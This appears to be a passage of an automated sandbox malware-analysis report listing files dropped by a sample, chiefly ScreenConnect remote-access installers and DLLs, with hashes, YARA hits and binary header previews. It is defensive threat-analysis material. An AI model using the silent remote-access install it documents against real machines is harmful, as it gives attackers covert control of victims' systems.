                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                    Entropy (8bit):4.340550904466943
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                                                                                                    MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                                                                                    SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                                                                                    SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                                                                                    SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):57344
                                                                                                                                                                    Entropy (8bit):4.657268358041957
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                                                                                                    MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                                                                                    SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                                                                                    SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                                                                                    SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):176128
                                                                                                                                                                    Entropy (8bit):5.775360792482692
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                                                                                                    MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                                                                                    SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                                                                                    SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                                                                                    SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):548864
                                                                                                                                                                    Entropy (8bit):6.034211651049746
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                                                    MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                                                    SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                                                    SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                                                    SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):11776
                                                                                                                                                                    Entropy (8bit):5.273875899788767
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                                                                                                    MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                                                                                                    SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                                                                                                    SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                                                                                                    SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1721856
                                                                                                                                                                    Entropy (8bit):6.639085961200334
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                                                    MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                                                    SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                                                    SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                                                    SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\4ec95f.msi

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\4ec961.msi

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {14C6E684-39F9-9C17-EDF7-878C827CA860}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9961472
                                                                                                                                                                    Entropy (8bit):7.957250026307833
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GwJ4t1h0cG5FGJRPxow8O+wJ4t1h0cG5FwJ4t1h0cG5iwJ4t1h0cG5jwJ4t1h0cW:TWh0cGwVWh0cGAWh0cGpWh0cGGWh0cG
                                                                                                                                                                    MD5:EB678C7AB43E21B2E9BD38B8DB7EE8C0
                                                                                                                                                                    SHA1:C059F88FFF2D111C8EFEAED4BCA0FEDD2145CF88
                                                                                                                                                                    SHA-256:3B5C41C0F4BF1D37DA3D9E61593DA64EA192BAEAB4A9036A24F3D268A3F8A39B
                                                                                                                                                                    SHA-512:F9D8207EFE37BF66A38B1B4DE6699F46EEC892785DB00BD471B6BB7837FA90DA6F00F976E2AB60BB58E9B8ACE73D3339622376A61F3F98A75F310C28E89C7385
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...........................................................}...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\MSICBE0.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):423662
                                                                                                                                                                    Entropy (8bit):6.577643816442937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:8uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvX:8uH2anwohwQUv5uH2anwohwQUvX
                                                                                                                                                                    MD5:261D61FCEE2029AD277DF1624FB2C5ED
                                                                                                                                                                    SHA1:29E4ACC17B994BE2BD6354DC764A2DAE6B36FEB0
                                                                                                                                                                    SHA-256:49DEFEF28E9B98E26F088949B89CC28A6332FD9B91555BB982C314B23FFDC3FF
                                                                                                                                                                    SHA-512:2F10417FAF8984F7BDFD6D81714413A8371F9212EC9E78569E5EC076FF5DD96D45D2FDBCC6DA07107B9327986BF8C8F45D1027F3A6AF641A9B357271BBB7DBD3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSICBE0.tmp, Author: Joe Security
                                                                                                                                                                    Preview:...@IXOS.@.....@.R.Y.@.....@.....@.....@.....@.....@......&.{14C6E684-39F9-9C17-EDF7-878C827CA860}'.ScreenConnect Client (a532d472f1ff1d4e)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{14C6E684-39F9-9C17-EDF7-878C827CA860}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a532d472f1ff1d4e)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{CF9AE42D-A542-A5BE-DF54-2B1FF488B5E3}^.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{9509AE8A-E997-4132-8CAB-BAFE89DF77F6}f.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{8B377FBF-DB9A-CC34-86C5-7376F38045E2}c.C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileMa

                                                                                                                                                                    C:\Windows\Installer\MSICBF0.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):207360
                                                                                                                                                                    Entropy (8bit):6.573348437503042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\MSICFCA.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):207360
                                                                                                                                                                    Entropy (8bit):6.573348437503042
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                                                    MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                                                    SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                                                    SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                                                    SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\SourceHash{14C6E684-39F9-9C17-EDF7-878C827CA860}

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.1716762355752257
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:JSbX72Fj0AGiLIlHVRpIh/7777777777777777777777777vDHFDtR7rl0i8Q:J6QI5wNKF
                                                                                                                                                                    MD5:7F7ADC82FA8D929780C207261F03790E
                                                                                                                                                                    SHA1:67B29E5941005E53ED45C2CABD900A7064A97685
                                                                                                                                                                    SHA-256:C861C1740307AD97AF94E20E9EF3D06D8C3178241EFE2C0705A89C929323484B
                                                                                                                                                                    SHA-512:DB3DFCBAE5F1BFA81173905BCA7ADF6356EDDFA4F25BE1CFFA4DF948E3879D4B3C46B9141788A38A109FFEFA87B4AFE523BE4A89DF44ACA08DEBDBB6AB8A89E9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                    Entropy (8bit):1.8095888546286913
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:18PhMuRc06WXzuFT5J9IYIBoqcq56AduHvlSied/2cPWGn3f9aud+GZPbdosrGAX:YhM1zFTs9p4fed/4G3f9FDME
                                                                                                                                                                    MD5:42308293DC812DF71F43C377513FDC6E
                                                                                                                                                                    SHA1:10C83D98875F566BD28C64F6E083F4CC811906D8
                                                                                                                                                                    SHA-256:2C7EED1657BDD2737F64551414D337DA88944DE0429DBB841DFF47479F0C76ED
                                                                                                                                                                    SHA-512:22695837D539F68F6134EFD04B159A88BBD6C8A0982C8E37B8ADEDFE550BC680F302FC110C76154D03E26EE47C0784AF06D64E3A623EDB13B13FFB49675D17EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\Installer\{14C6E684-39F9-9C17-EDF7-878C827CA860}\DefaultIcon

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                    Entropy (8bit):5.289734780210945
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                                                                                                                    MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                                                                                                                    SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                                                                                                                    SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                                                                                                                    SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):432221
                                                                                                                                                                    Entropy (8bit):5.375179125495492
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauy:zTtbmkExhMJCIpErr
                                                                                                                                                                    MD5:A5AD77CB5B31EA089864272EBCCAA27D
                                                                                                                                                                    SHA1:2A98A156CAA578B37ADE6687AE56689E5C54F177
                                                                                                                                                                    SHA-256:FE606FD17E1B6E909000EC9D652AA8510301840DCA6A8FF0FFEA302A4E82BAB3
                                                                                                                                                                    SHA-512:DFD3C8CFC660D72F09E12DA3A4E084403AC36473B61A9ACF86139B13C1412CF6FF29999491502F34B230F41A51C0C346C6C82BF8B5F4A8A3B4DD3F253596C47C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
